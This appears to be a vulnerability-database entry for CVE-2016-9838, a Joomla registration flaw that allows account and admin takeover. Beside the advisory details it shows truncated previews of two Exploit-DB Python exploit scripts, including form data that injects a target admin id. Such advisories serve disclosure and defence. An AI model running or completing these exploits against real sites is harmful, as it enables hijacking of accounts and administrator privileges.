CVE-2016-9838
published 2016-12-16CVE-2016-9838: An issue was discovered in components/com_users/models/registration.php in Joomla! before 3.6.5. Incorrect filtering of registration form data stored to the…
PriorityP359high7.5CVSS 3.0
AVNACLPRNUINSUCNIHAN
EXPLOIT
EPSS
14.10%
96.1th percentile
An issue was discovered in components/com_users/models/registration.php in Joomla! before 3.6.5. Incorrect filtering of registration form data stored to the session on a validation error enables a user to gain access to a registered user's account and reset the user's group mappings, username, and password, as demonstrated by submitting a form that targets the `registration.register` task.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | <= 3.6.4 | — |
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! < 2.5.2 - Admin Creation
exploitdb·2017-01-20·CVSS 7.5
CVE-2012-1563 [HIGH] Joomla! < 2.5.2 - Admin Creation
Joomla! < 2.5.2 - Admin Creation
---
#!/usr/bin/python3
# CVE-2012-1563: Joomla! <= 2.5.2 Admin Creation
# cf
# Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
import bs4
import requests
import random
url = 'http://vmweb.lan/joomla-cms-2.5.2/'
form_url = url + 'index.php/using-joomla/extensions/components/users-component/registration-form'
action_url = url + 'index.php/using-joomla/extensions/components/users-component/registration-form?task=registration.register'
username = 'user%d' % random.randrange(1000, 10000)
email = username + '@yopmail.com'
password = 'ActualRandomChimpanzee123'
user_data = {
'name': username,
'username': username,
'password1': password,
'password2': password + 'XXXinvalid',
'email1': email,
'email2': ema
Exploit-DB
Joomla! < 3.6.4 - Admin Takeover
exploitdb·2017-01-20·CVSS 7.5
CVE-2016-9838 [HIGH] Joomla! < 3.6.4 - Admin Takeover
Joomla! < 3.6.4 - Admin Takeover
---
#!/usr/bin/python3
# CVE-2016-9838: Joomla! <= 3.6.4 Admin TakeOver
# cf
# Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
import bs4
import requests
import random
ADMIN_ID = 384
url = 'http://vmweb.lan/Joomla-3.6.4/'
form_url = url + 'index.php/component/users/?view=registration'
action_url = url + 'index.php/component/users/?task=registration.register'
username = 'user%d' % random.randrange(1000, 10000)
email = username + '@yopmail.com'
password = 'ActualRandomChimpanzee123'
user_data = {
'name': username,
'username': username,
'password1': password,
'password2': password + 'XXXinvalid',
'email1': email,
'email2': email,
'id': '%d' % ADMIN_ID
}
session = requests.Session()
# Grab original
http://www.securityfocus.com/bid/94893https://www.exploit-db.com/exploits/41157/https://www.joomla.org/announcements/release-news/5693-joomla-3-6-5-released.htmlhttp://www.securityfocus.com/bid/94893https://www.exploit-db.com/exploits/41157/https://www.joomla.org/announcements/release-news/5693-joomla-3-6-5-released.html
2016-12-16
Published